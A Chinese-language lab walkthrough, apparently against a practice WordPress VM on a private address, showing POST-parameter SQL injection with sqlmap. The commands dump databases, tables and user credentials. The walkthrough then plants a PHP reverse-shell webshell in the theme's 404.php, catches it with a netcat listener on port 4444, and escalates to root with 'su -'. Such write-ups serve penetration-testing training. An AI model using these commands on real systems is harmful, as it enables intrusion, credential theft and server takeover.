post参数注入
sql注入介绍
信息探测
针对一些http服务的:
使用nikto进行http扫描:
再使用dirb继续进行探测:
敏感信息的探测:
漏洞扫描
使用owasp-zap
探测完之后,没有高危漏洞。
漏洞利用
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 --tables --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users --columns --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users -C username,password --dump --dbms mysql --batch
在使用burpsuite进行有关探测,得到request.raw文件。
浏览器进行有关的设置:
设置完毕。准备进行反弹raw文件
进行设置一下端口。
得到了raw文件,复制到桌面上,为以后的sqlmap做准备文件。
sqlmap进行破解
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 --tables --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users --columns --dbms mysql --batch
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users -C username,password --dump --dbms mysql --batch
得到了所有的数据库。
使用wordpress8080得到该数据库中的表。
得到user表中有的列名以及相关类型。
得到了用户名以及密码。
上传webshell获取控制权限
使用自带的php文件,修改相对应的参数,上传webshell获取控制权限。
修改完之后保存,之后全部复制下来,准备进行上传。
知道了用户名以及密码之后登陆这个网站。
http://192.168.56.102:8080/wordpress/wp-login.php
找到对应的404.
上传完毕完毕,终端准备进行监听。
nc -nlvp 4444
浏览器登陆有关网址。
http://192.168.56.102:8080/wordpress/wp-content/themes/twentythirteen/404.php
执行webshell,监听才可以起作用。
监听之返回对应的权限了。
使用 su - 进行提权到root。
完毕!!!